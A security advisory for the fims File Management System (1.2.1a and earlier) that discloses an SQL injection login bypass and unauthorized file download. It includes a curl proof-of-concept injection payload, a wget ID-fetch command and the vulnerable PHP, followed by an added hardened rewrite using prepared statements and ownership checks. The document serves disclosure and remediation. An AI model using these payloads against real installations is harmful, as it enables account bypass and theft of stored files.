Title: fims - File Management System <= 1.2.1a SQL Injection and Unauthorized File Download
Author: Skraps (jackie.craig.sparks (at) live.com, jackie.craig.sparks (at) gmail.com, @skraps_foo)
Vendor: http://fims.codeplex.com/
Affected Versions: 1.2.1a (tested)
---------------
Proof of concept (POST or GET data)
---------------
curl --data "email=help@juno.com&password=word') or id=ABS('1" http://127.0.0.1/fims/?p=1
wget "http://127.0.0.1/fims/index.php?f={any file number}"
---------------
Technical analysis:
---------------
Line 18 of index.php:
    if (login($g_db, $_REQUEST['email'], $_REQUEST['password']))
Line 117 of functions.php:
    function login($db, $email, $password)
    {
        // both $email and $password are interpolated straight into the SQL string
        $rs = $db->execute("select * from fims_user where email='$email' and password=md5('$password')");
        if ($db->numrows($rs) > 0) return true;
        else return false;
    }
Line 51 of index.php:
    if (isset($_REQUEST['f']))
    {
        // only a numeric check, no check that the requester may read this file
        assert(is_numeric($_REQUEST['f']));
        $file = get_file_data($g_db, $_REQUEST['f']);
        header("Accept-Ranges: bytes");
        header("Content-Length: " . filesize("files/" . $file['id']));
        header("Content-Type: {$file['mime']}");
        header("Content-Disposition: inline; filename=\"{$file['label']}\";");
        readfile("files/" . $file['id']);
    }
Fix: see the code analysis above.
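As an added illustration of the fix (example code written here, not part of fims or of the original advisory), the two routines analysed above rewritten in a hardened form. It assumes a PDO connection in $g_db, a session-held id of the logged-in user, and a file table named fims_file with an owner_id column; those names, and the function names login_safe and send_file_safe, are assumptions, not fims identifiers. The login query binds both email and password as parameters, so neither input can alter the SQL; the download handler validates the id in PHP rather than with assert() (which is skipped entirely when zend.assertions is off, as is common in production), binds the id in the lookup, and refuses the request unless the caller is logged in and owns the file.

```php
<?php
// Added example, not fims code. Assumes: PDO in $g_db, $_SESSION['user_id'] for
// the current user, and a file table fims_file(id, mime, label, owner_id).
declare(strict_types=1);

// Login with a prepared statement: user input is bound, never concatenated.
// md5() is kept only to match the existing fims_user.password column as the
// advisory shows it; a new schema should store password_hash() output instead.
function login_safe(PDO $db, string $email, string $password): bool
{
    $stmt = $db->prepare(
        'SELECT password FROM fims_user WHERE email = :email'
    );
    $stmt->execute([':email' => $email]);
    $stored = $stmt->fetchColumn();
    if ($stored === false) {
        return false; // unknown email
    }
    // Constant-time comparison of the stored hash against the hash of the input.
    return hash_equals((string) $stored, md5($password));
}

// File download: integer-validate the id, look the row up with a bound
// parameter, and serve it only to its owner. Returns false (and sends nothing)
// when the request is rejected, so the caller can answer 403/404.
function send_file_safe(PDO $db, array $request, ?int $current_user_id, string $files_dir): bool
{
    if ($current_user_id === null) {
        return false; // not logged in
    }
    $id = filter_var(
        $request['f'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($id === false) {
        return false; // not a positive integer
    }
    $stmt = $db->prepare(
        'SELECT id, mime, label, owner_id FROM fims_file WHERE id = :id'
    );
    $stmt->execute([':id' => $id]);
    $file = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($file === false || (int) $file['owner_id'] !== $current_user_id) {
        return false; // unknown file or not the caller's file: same answer for both
    }
    // Build the on-disk path from the database id only and confirm it resolves
    // inside the files directory before reading it.
    $base = realpath($files_dir);
    $path = realpath($files_dir . '/' . $file['id']);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    // Keep CR/LF and quotes out of the filename used in a response header.
    $label = str_replace(["\r", "\n", '"'], '', (string) $file['label']);
    header('Accept-Ranges: bytes');
    header('Content-Length: ' . filesize($path));
    header('Content-Type: ' . $file['mime']);
    header('Content-Disposition: inline; filename="' . $label . '"');
    readfile($path);
    return true;
}

// Usage sketch for index.php (assumed session handling):
// session_start();
// if (login_safe($g_db, $_POST['email'] ?? '', $_POST['password'] ?? '')) { /* set $_SESSION['user_id'] */ }
// if (isset($_GET['f'])
//     && !send_file_safe($g_db, $_GET, $_SESSION['user_id'] ?? null, __DIR__ . '/files')) {
//     http_response_code(403);
// }
```

Two points worth carrying over to any real fix: the original login concatenates the email field as well as the password, so parameterising only one of them would leave the other path open; and the numeric check on f, even when it does run, says nothing about who is allowed to fetch a given id, which is why the ownership test (or an equivalent ACL lookup) is the part that actually closes the file download issue.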